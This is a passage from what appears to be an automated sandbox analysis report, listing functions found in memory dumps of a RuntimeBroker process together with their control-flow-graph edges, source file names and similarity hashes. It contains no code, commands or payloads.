                                            control_flow_graph 530 7ffd9b8a40ed-7ffd9b8a4223 VirtualAlloc 535 7ffd9b8a4225 530->535 536 7ffd9b8a422b-7ffd9b8a428f 530->536 535->536
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8A2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A2000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8a2000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 60af26e9af14c7784470a6da5abda85eeb77c1c14c1e6c838221f98069d9eb68
                                            • Instruction ID: 99c3e20e876ba522754d7804c79cd24bf9c884682d971e528ff1d0e7525b2ab2
                                            • Opcode Fuzzy Hash: 60af26e9af14c7784470a6da5abda85eeb77c1c14c1e6c838221f98069d9eb68
                                            • Instruction Fuzzy Hash: 21515B70908A5C8FDF98EF68C845BE9BBF1FB69310F1041AAD04DE3251DB74A9858F80
                                            Function 00007FFD9B89C4B6 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 540 7ffd9b89c4b6-7ffd9b89c4ca 541 7ffd9b89c4d4-7ffd9b89c517 540->541
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b89c000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: >
                                            • API String ID: 0-325317158
                                            • Opcode ID: 6bc67f4a226e8bbd3c4dc4bd85d8488da0f774ae3399aca52f6ca3e1f51a1f7c
                                            • Instruction ID: 2ce279204f916b6e4f229671fe4801d7f21aafb86717f318ab623138e165fdab
                                            • Opcode Fuzzy Hash: 6bc67f4a226e8bbd3c4dc4bd85d8488da0f774ae3399aca52f6ca3e1f51a1f7c
                                            • Instruction Fuzzy Hash: 64F05470D0912E8AEB64EF94C8687A9BAB0EB18304F1155F5D11EA2291DB786A84CE51
                                            Function 00007FFD9B8D93CD Relevance: .4, Instructions: 402COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b1abec711e47a24457f5248e475c029fb6292d05dd5afb525b0171a26384dfb
                                            • Instruction ID: bf6f9b381113ece10352e05a8a71649cec9444e46c4667b5f8b09fa9ed3ee597
                                            • Opcode Fuzzy Hash: 9b1abec711e47a24457f5248e475c029fb6292d05dd5afb525b0171a26384dfb
                                            • Instruction Fuzzy Hash: B2E14E71E1965D8FDBACDF58C865BE8B7E1FF98300F4442BAD00D932A2DA346985CB41
                                            Function 00007FFD9B8E2A2F Relevance: .3, Instructions: 292COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 671 7ffd9b8e2a2f-7ffd9b8e2a41 673 7ffd9b8e2a43-7ffd9b8e2a46 671->673 674 7ffd9b8e2a5d-7ffd9b8e2c4f 671->674 675 7ffd9b8e2a4b-7ffd9b8e2a5c 673->675 676 7ffd9b8e2a48 673->676 682 7ffd9b8e2c56-7ffd9b8e2c6e 674->682 683 7ffd9b8e2c51 674->683 675->674 676->675 684 7ffd9b8e2c74-7ffd9b8e2c81 682->684 683->682
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c92a0a9453ac5e88a7e63a3bef826ddab8bacf677d1c678015823b406742a153
                                            • Instruction ID: 3ddbfb23f6e27b87b7fb944b4417d7e950ff0d5556a296c1e8a885c77fd83c6d
                                            • Opcode Fuzzy Hash: c92a0a9453ac5e88a7e63a3bef826ddab8bacf677d1c678015823b406742a153
                                            • Instruction Fuzzy Hash: 3C21B231A0DA4D8FEB69FFA898195E93BA0FF65310F0401BBD419C30E2DA34A545C781
                                            Function 00007FFD9B890A19 Relevance: .3, Instructions: 283COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b890000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 002ff0dfdb11bc8812b509e799142451b613be58f33165a7368c3ee23d139222
                                            • Instruction ID: 05430e2934d2e9936b5f12a45cc3c6848c0fc923848589b871173131c9e5f833
                                            • Opcode Fuzzy Hash: 002ff0dfdb11bc8812b509e799142451b613be58f33165a7368c3ee23d139222
                                            • Instruction Fuzzy Hash: 4B711A11F2EB4E0AEB68667C08652B57AC2EF99B15F26027DE4DFC32E7DC1C69074241
                                            Function 00007FFD9B891AFD Relevance: .3, Instructions: 273COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 734 7ffd9b891afd-7ffd9b891b49 738 7ffd9b891b4b 734->738 739 7ffd9b891b50-7ffd9b891d33 call 7ffd9b890838 734->739 738->739 765 7ffd9b891d3b-7ffd9b891dbc 739->765 768 7ffd9b891dc5-7ffd9b891e2c 765->768 769 7ffd9b891dbe-7ffd9b891dc4 765->769 769->768
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b890000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cc6eb0b1d5b7db792d76885e1d38657082d49e58c51c4765b04bd1df98dd3eac
                                            • Instruction ID: 0e02d96538caa15dae6ec49869c32e97cba2de61062b7b82b4d4f3ed170aad64
                                            • Opcode Fuzzy Hash: cc6eb0b1d5b7db792d76885e1d38657082d49e58c51c4765b04bd1df98dd3eac
                                            • Instruction Fuzzy Hash: 09A19171A18A8D9FEB98EB68D8657EC7BE1FF58304F4001BED009D32A6DA782405C741
                                            Function 00007FFD9B8D95AA Relevance: .2, Instructions: 169COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 358f056cf841d0e5835a97f81aa132e2685ebe623e73b838e367320c1254addf
                                            • Instruction ID: 69e00005737b9afa3deed7bc16102c2d30bc13fc93c7b34644e5e6a533c49223
                                            • Opcode Fuzzy Hash: 358f056cf841d0e5835a97f81aa132e2685ebe623e73b838e367320c1254addf
                                            • Instruction Fuzzy Hash: DF51FA70E19A5D8FDB98EF58C865BA8B7B2FF98300F5041BAD01ED7296DA346941CB00
                                            Function 00007FFD9B890868 Relevance: .2, Instructions: 169COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b890000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 624c08d9ec36b935ed91bb3ee375a954ee98011f75be7561f1faa831aa40cead
                                            • Instruction ID: ffe7bcf3e76963da4c70352cec63ae7b5eac9788dc6378f914723385df2f53f0
                                            • Opcode Fuzzy Hash: 624c08d9ec36b935ed91bb3ee375a954ee98011f75be7561f1faa831aa40cead
                                            • Instruction Fuzzy Hash: BC412931B2D6588FDB64EB7C88556B97BE1FF5D301B0501BAE09ED72A2DE24D8018741
                                            Function 00007FFD9B8DF7BE Relevance: .2, Instructions: 157COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a962b58b19ffd6182dcf1d6ff13484411dc3971177196940ac46d2547b5a8f50
                                            • Instruction ID: b021027b426618b159da6380fa4e8313f6fba46d4d03b48b68520443749da0fc
                                            • Opcode Fuzzy Hash: a962b58b19ffd6182dcf1d6ff13484411dc3971177196940ac46d2547b5a8f50
                                            • Instruction Fuzzy Hash: 4E519370E15A1D8FDB94EF98C895BADB7F1FB98301F2082AAD40CE3255DB346985CB41
                                            Function 00007FFD9B8AC44C Relevance: .1, Instructions: 146COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 11939bfded02e6884d2549e38e2399d956f2be66b5895e4b698ca2c57edc106a
                                            • Instruction ID: 0d0e0ed7aff1f4a975359de27e393ceb4ba170f2e768775e86d0eae56dff3c88
                                            • Opcode Fuzzy Hash: 11939bfded02e6884d2549e38e2399d956f2be66b5895e4b698ca2c57edc106a
                                            • Instruction Fuzzy Hash: 2051BE70E0991D8FDBA8DB58C8A5AA9B7B5FF58300F5081A9D00DD3295DE34AD81CF50
                                            Function 00007FFD9B8AC472 Relevance: .1, Instructions: 137COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28ba6ca548894b1d7b69b9d440ee8f0a2537b599ce67360fd2a9adf02b9a2d20
                                            • Instruction ID: 34c22d6dd6e5f50ddb6cd14e8423fc2e0fbf6165ee4934633b2e4b5b74b7b887
                                            • Opcode Fuzzy Hash: 28ba6ca548894b1d7b69b9d440ee8f0a2537b599ce67360fd2a9adf02b9a2d20
                                            • Instruction Fuzzy Hash: E851D170E0991D8FDBA8DB58C895AA9B7B5FF58300F5082E9D00DE32A5DE35AD81CF50
                                            Function 00007FFD9B8AC496 Relevance: .1, Instructions: 131COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eed4b455fd0f7f979f53fbb6856d72264b779fc893f573177a9bd0458c565bd7
                                            • Instruction ID: 280b110e905efea10bbc47ef14b4a4b6f4548cea0896499e4d95bd91473cbcbe
                                            • Opcode Fuzzy Hash: eed4b455fd0f7f979f53fbb6856d72264b779fc893f573177a9bd0458c565bd7
                                            • Instruction Fuzzy Hash: 5851CE70E0991D8FDBA8DF58C8A5AADB7B5FF58300F5082A9D00DD32A5DA35AD81CF50
                                            Function 00007FFD9B8AC0CB Relevance: .1, Instructions: 125COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7869f066d3efab23553721524ee221e8dc838c21e2b2ccffac96e5c8b4b07384
                                            • Instruction ID: 415c55a835000885618c9ae55a4a4ab3b298ad4a194ecbedf5675c472a62e5a6
                                            • Opcode Fuzzy Hash: 7869f066d3efab23553721524ee221e8dc838c21e2b2ccffac96e5c8b4b07384
                                            • Instruction Fuzzy Hash: 6E410E70E1991D8FDBA8DB58C8A5AA9B7B1FF58300F5082F9D00DD3295DE35AD818F90
                                            Function 00007FFD9B8AC395 Relevance: .1, Instructions: 124COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 754a9f7de8c836606cca1f92a9bfb032b9f285b258469a1e8f9e208e3256db5c
                                            • Instruction ID: dd68b5b5d375817ffd2487a4144a427c59a6858559b027e5351a5adba599ce7f
                                            • Opcode Fuzzy Hash: 754a9f7de8c836606cca1f92a9bfb032b9f285b258469a1e8f9e208e3256db5c
                                            • Instruction Fuzzy Hash: 0741E170A1991D8FDBA8DB48C855BA9B3F1FF58300F1082E9D44DD3265DE35A982CF80
                                            Function 00007FFD9B895025 Relevance: .1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b890000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a4763f33b0acc0f1dbd54ed6ca9c7a7e7a2f87cf37c094beb46199780178fb1e
                                            • Instruction ID: 1b1ceb91797d88a5b472a52a6e8fb6bcacd9042afb850844a078310be29a52ce
                                            • Opcode Fuzzy Hash: a4763f33b0acc0f1dbd54ed6ca9c7a7e7a2f87cf37c094beb46199780178fb1e
                                            • Instruction Fuzzy Hash: E241FD75A1861D8FDFA4EF14C865AEDB7B0EB58305F1001EAC00EE32A1DB745A808F41
                                            Function 00007FFD9B8AC348 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0017faca67c816d6fd75907f5ff6de373086ecba2e81440920a463fb83f3e5a5
                                            • Instruction ID: 35123ecedb35ca85bab9353a3c68f05c97b80b57e2d08d061dabbc19305fab6c
                                            • Opcode Fuzzy Hash: 0017faca67c816d6fd75907f5ff6de373086ecba2e81440920a463fb83f3e5a5
                                            • Instruction Fuzzy Hash: 8A418E70E1991D8FDB98DB58C895BA9B7B1FB98304F5082E9D00DD3295DE35AE82CF40
                                            Function 00007FFD9B8AC2C2 Relevance: .1, Instructions: 109COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 499dec64acb80fa2b7a18a9ad5ea35708bcc353c1129a23ce7c02feed662f4c5
                                            • Instruction ID: 890cfb3b92898f5814568c9ebf578ffa4c82e7809e2e2bfc760e9f0fdc71286d
                                            • Opcode Fuzzy Hash: 499dec64acb80fa2b7a18a9ad5ea35708bcc353c1129a23ce7c02feed662f4c5
                                            • Instruction Fuzzy Hash: DC418E70E1991D8FDB98DB58C895BA9B7B1FB98304F5082E9D00DD3295DE35AE82CF40
                                            Function 00007FFD9B8AC3EE Relevance: .1, Instructions: 103COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b44a12f891fe86d8b1eb699f13ca71f7d357d2f7f5acfb4114d5d4a39cd97498
                                            • Instruction ID: de894350408542f8a43f0f7313fe76ec99450f4d3f803fe76cf61f13df33ee87
                                            • Opcode Fuzzy Hash: b44a12f891fe86d8b1eb699f13ca71f7d357d2f7f5acfb4114d5d4a39cd97498
                                            • Instruction Fuzzy Hash: FD41F370E1991D8FDB98DB58C895AA9B7B1FF58300F5082E9D04DD31A5DE35AD82CF80
                                            Function 00007FFD9B8AC3FB Relevance: .1, Instructions: 100COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 968aea6b75dc28118faa7ac6096bc9f8644798accf6d02243ad60a916eba8210
                                            • Instruction ID: 56c16107887c4493e0a76f34114f7e64240041a6769201048183d3778019a3e9
                                            • Opcode Fuzzy Hash: 968aea6b75dc28118faa7ac6096bc9f8644798accf6d02243ad60a916eba8210
                                            • Instruction Fuzzy Hash: E4319D70E1991D8FDB98DB58C895AA9B7B1FB58300F5082E9D00DD32A5DE35AD82CF50
                                            Function 00007FFD9B890838 Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b890000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 41cca6ae0a395042e30e3674811d18976008c397fcb7c16671c9b8f5d51012fc
                                            • Instruction ID: b0a40a9d239726f99a3abd22ce4a448419518fbafb51f8aa391648187aad28df
                                            • Opcode Fuzzy Hash: 41cca6ae0a395042e30e3674811d18976008c397fcb7c16671c9b8f5d51012fc
                                            • Instruction Fuzzy Hash: B9210D32A1D2A84ED725BB7C68694EA7FE0EF49229B14017BE4DAC6193DA2491468381
                                            Function 00007FFD9B891575 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b890000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1d3008589e8892fbc7511fed14dbb5c0c2fb3436a6a8c84dd539ebb59baed619
                                            • Instruction ID: cc5e652a3a60e5a99bf85c53aa172398a1d297b0b4f775a29792ea945031f8a0
                                            • Opcode Fuzzy Hash: 1d3008589e8892fbc7511fed14dbb5c0c2fb3436a6a8c84dd539ebb59baed619
                                            • Instruction Fuzzy Hash: 37310731F0D69E9BDB12BBA8CC252EDBBB0EF45311F064177D025C72D2DA3866068B51
                                            Function 00007FFD9B8D6EAD Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8dc0a774f94661d6e48beeffef008403e63ebc1c0c421e59902dbab6b891cf56
                                            • Instruction ID: 0ff62bd8f35d77d5df6a69467f7efec67ee6e6618d7b1a6c06df7252986fb33d
                                            • Opcode Fuzzy Hash: 8dc0a774f94661d6e48beeffef008403e63ebc1c0c421e59902dbab6b891cf56
                                            • Instruction Fuzzy Hash: 2E316870A0AA4D8FDB68DF68C8656ED77E1EB98300F11027ED009E3291DA7969458B51
                                            Function 00007FFD9B895193 Relevance: .1, Instructions: 81COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b890000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8de156b253870351f868a6e526e9ef35f8d245c49bda10284b5e6e356248bd85
                                            • Instruction ID: dccd13c056fd7745bf92913365593e51ee432a22723c9415a61f394fe2551454
                                            • Opcode Fuzzy Hash: 8de156b253870351f868a6e526e9ef35f8d245c49bda10284b5e6e356248bd85
                                            • Instruction Fuzzy Hash: A6318D35A1891D8FDF94EF04C865AEDB7B1FB64309F1001EA900EE3265DB759A85CF41
                                            Function 00007FFD9B8A8A5D Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8a6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b71c1f88f5b0418e68c42aeb08218e30c71ef6f27ff29dc93921e134b4acdee
                                            • Instruction ID: dab95d07f37778ab5a62643e244d91b93083be88ab7877be648b9c6be593346c
                                            • Opcode Fuzzy Hash: 0b71c1f88f5b0418e68c42aeb08218e30c71ef6f27ff29dc93921e134b4acdee
                                            • Instruction Fuzzy Hash: 8721C031A0964D8FDB18DF48C8646ED77F1FF98310F11027AD40AE3291DA38AA15CB92
                                            Function 00007FFD9B8D7BD9 Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7bd7bba3921d9bb822c6132d136071ffd7d41116e4226e01da2dd66aa25403b4
                                            • Instruction ID: 982ceacc1f469d2d4ab927ee102e84ad4d9b1d87d6959e39e2e821bb33eb3b7a
                                            • Opcode Fuzzy Hash: 7bd7bba3921d9bb822c6132d136071ffd7d41116e4226e01da2dd66aa25403b4
                                            • Instruction Fuzzy Hash: 42213B34E4960D8FEB68DF84C8647BCB7B1FB98301F5102BED009A7291CB782A85CB40
                                            Function 00007FFD9B8DF02D Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 81f23bc3f6cf1898d5d49f1232ec61a3c68ef9c76b494f17625ca8667c4b7ca3
                                            • Instruction ID: c64e956e05f02f8d18cd6d4667bdcd06f4588d434a612ffadbbb5b5b700ce73e
                                            • Opcode Fuzzy Hash: 81f23bc3f6cf1898d5d49f1232ec61a3c68ef9c76b494f17625ca8667c4b7ca3
                                            • Instruction Fuzzy Hash: 0C118F32A0E6CD4FDB56CF649C659B87BB0EF66301B0602FBD058C71A2CA65AA44C781
                                            Function 00007FFD9B8A0CE4 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b89c000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa87109d89ab3a9fa034edefc689ea6a7d5ad865ca5c9db97e3f0e20f0700f05
                                            • Instruction ID: b9033c83898eac9a6c4ab4ba3a0e4f8c7fba280d1df7da1a080e4ddb3b8859f5
                                            • Opcode Fuzzy Hash: aa87109d89ab3a9fa034edefc689ea6a7d5ad865ca5c9db97e3f0e20f0700f05
                                            • Instruction Fuzzy Hash: 84119634A1952D8FDFA9DB48C895AA8B3B6FF59301F1041E9D00EE7261CB75AE80CF40
                                            Function 00007FFD9B8D78B5 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c45ce9c01ccd36a34152d1b526bf79273b5055f391eb20708da26ba687ab8f6d
                                            • Instruction ID: b8824da7f9f6533344147f5e2033c5134972095a8fdbc68c922b55df6b5b4214
                                            • Opcode Fuzzy Hash: c45ce9c01ccd36a34152d1b526bf79273b5055f391eb20708da26ba687ab8f6d
                                            • Instruction Fuzzy Hash: 2011BF36A0865E8FEB55EF58D8555FD37E0FF58314B04067BD40DC7192DA34AA41CB81
                                            Function 00007FFD9B8A0D5E Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b89c000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 26c9518c171e9608ef749a23df4cd1d00c37a94b5921de06e2009442dcbb5beb
                                            • Instruction ID: 3bf88252d7c337e4e8e3bff846b56b1d45c69af0b00cd567307207406be0e26b
                                            • Opcode Fuzzy Hash: 26c9518c171e9608ef749a23df4cd1d00c37a94b5921de06e2009442dcbb5beb
                                            • Instruction Fuzzy Hash: 2F21B834A1951D8FCBA9DB48C895AA8B3B5FF59301F5001E9D00DE7261CB71AE80CF40
                                            Function 00007FFD9B89FAEC Relevance: .1, Instructions: 55COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b89c000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 49f9a25965a9916dfff64e9d0bc3f190392675e5f15922ded998357502add174
                                            • Instruction ID: b4930aa8fd586fa7f8c067255e41c3c077d7fd853267674dfc558f05d30ed93c
